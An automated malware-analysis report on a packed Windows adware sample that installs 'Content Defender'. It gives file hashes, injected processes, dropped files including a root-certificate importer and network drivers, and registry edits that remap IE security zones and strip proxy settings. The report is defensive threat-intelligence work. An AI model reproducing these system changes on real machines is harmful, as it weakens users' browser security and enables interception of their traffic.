Adware.Agent.PZQ (B) (Emsisoft), Adware.Agent.PZQ (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, VirTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a6af155a869de79a9606a01f9f9d20f3
SHA1: dafb205637e386d39420ff552b2f4ea9bf3c5af6
SHA256: bcf80cf0de4b3e7e55c0534954cbe3db7e0b8c9fdeb2f108d06697c2003b4f64
SSDeep: 49152:pyAIDq9l2nU/ sxVnOEZLQohfA4jeFvV QKOgxxqlP81XF:pyAIDqPlVnPZ0ofA0eFMQy3qx
Size: 1948920 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPXv0896v102v105v122Delphistub, UPolyXv05_v6
Company: down update
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Adware creates the following process(es):
verclsid.exe:1296
ConDefSetup1211:1596
ContentDefender.exe:932
ContentDefender.exe:1412
The Adware injects its code into the following process(es):
%original file name%.exe:1040
ASIns.exe:960
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexRasPbFileShimCacheMutexMutexNPA_UnitVersioning_1040__DDrawCheckExclMode____DDrawExclMode__DDrawDriverObjectListMutexDDrawWindowListMutex
File activity
The process %original file name%.exe:1040 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}\ASIns.exe (3686 bytes)
C:\libeay32.dll (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{78EB7090-90BD-4EE8-BC7A-3525B33EBFD0}\ConDefSetup1211v2.exe (39950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25142352-86ED-431B-B4EA-F14DA329AD61}\downloader.exe (181 bytes)
C:\ssleay32.dll (1821 bytes)
The process ASIns.exe:960 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\check[1].exe (12984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (18943 bytes)
The Adware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi5.tmp (0 bytes)
The process ConDefSetup1211:1596 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (41388 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (34724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe (5381 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefender.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%System%\drivers\contentdefenderdrv.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41020 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
The Adware deletes the following file(s):
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\115[1] (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (0 bytes)
The process ContentDefender.exe:932 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)
Registry activity
The process %original file name%.exe:1040 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{4991D59D-7589-4D2B-BAFF-849D813DA590}]
"ASIns.exe" = "ASIns"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{78EB7090-90BD-4EE8-BC7A-3525B33EBFD0}]
"ConDefSetup1211v2.exe" = "Content Defender Setup"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\a6af155a869de79a9606a01f9f9d20f3\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKCU\Software\IM]
"923" = "15-11-19 5:45:3"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 0F 68 A8 1F 2B 3A D4 1F C2 24 EA 33 3E 81 C9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Adware deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\a6af155a869de79a9606a01f9f9d20f3\DEBUG]
"Trace Level"
The process verclsid.exe:1296 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 B6 AC E6 24 6A 5C 2A 40 E6 15 69 F6 AC 9A CC"
The process ASIns.exe:960 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"pname" = "AS"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E E1 38 B5 A7 3C D7 AD 73 49 3E 8F D1 87 26 FD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Adware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ConDefSetup1211:1596 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"EstimatedSize" = "6000"
"Publisher" = "Artex Management S. A."
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
